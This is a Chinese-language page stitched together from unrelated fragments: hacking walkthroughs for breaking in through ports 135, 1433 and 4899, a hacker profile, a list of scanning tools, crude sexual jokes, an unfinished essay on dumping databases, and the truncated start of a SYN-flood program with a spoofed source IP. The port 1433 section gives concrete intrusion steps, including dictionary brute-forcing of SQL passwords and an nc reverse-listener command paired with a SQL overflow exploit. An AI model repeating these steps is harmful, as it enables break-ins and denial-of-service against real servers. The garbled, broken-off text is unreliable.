通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）

 

协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码；

 

1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破（字典是关键）
最后 SQLTools.exe入侵

对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
（以上反向的，测试成功）
sqlhelloz.exe 入侵ip 1433 （这个是正向连接）

2. 4899端口入侵
用4899过滤器.exe，扫描空口令的机器

3.

网名：小榕 
性别：男 
年纪： 
31 
婚姻：已婚 
资力：中国CAD/CAM协会会员，高级程序员 
格言：无论在现实或是网络中，我都是孤独的....... 
黑客原则：不能仇视社会，不能给别人制造麻烦，不能给别人带来损失。有人对黑客这样评价：黑客是一种不断研究不断探索的境界。 
个人站点：netxeyes.org 
============================================================ 
　　无可否认，小榕永远是中国黑客/安全界的骄傲！ 
小榕，1972

一、扫描工具 
黑易蜘蛛 国内最早最大的黑客搜索器!     
X-scan 3.1 国内最优秀的安全扫描软件之一!非常专业的一个扫描器!     
X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具!     
SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器!     
Namp 3.5 安全界人人皆知的非常有名气的一个扫描器!作者Fyodo

1.做男人就要做金刚那样的男人--在世界最高的大楼上为心爱的女人打飞机！！！ 
　　
　　2.男人的双手是最好的丰胸良药--终于发现我有一门手艺了……（双手愿为爱人而粗糙！） 
　　
　　3.JJ掉了不过碗大个疤！ 
　　
　　4.如果三天不做爱，那么你就是处男！ 
　　
　　5.据说从银河系看地球，唯一能看得见的就是我的小JJ了…… 
　　
　　6.我吞下一颗春药，世界立刻变得性感起来~ 
　　
　　7.如果谈恋爱就是谈恋爱的话，那不是耍流氓吗？ 

SQL注入流行很久了，我们找漏洞注入目的无非是想得到数据库内的东西，比如用户名密码等。（当然mssql数据库还可以借此获得权限）。如果我们不用注入就可以得到整个数据库，不是更好吗？于是暴库成了一个比注入更简单的的入侵手段。
有关暴库的方法，高*们常在入侵文章中提高，但多是一笔带过，有些就某一个方法谈的，也多是就方法进行探讨。最近有一篇《再谈%5c暴库的利用》文章，算是对暴库进行了一些总结，因而在网是流传很广。但仍没有谈及原理，而且结论也只是就于经验，似是而非，于是决定来谈谈暴库的原理与规律。
一，关

// synflood.cpp

#include <winsock2.h>
#include <Ws2tcpip.h>
#include <windows.h>
#include <stdio.h>

#pragma comment(lib,"ws2_32")
#pragma comment(lib,"wsock32")
#define FAKE_IP "201.79.131.18"
#define SEQ 0x28376839
#define right "===============Coder Paris-ye====================\n"
USHORT checksum(USHORT *buffer, int size);
int flood();

typedef struct tcphdr
{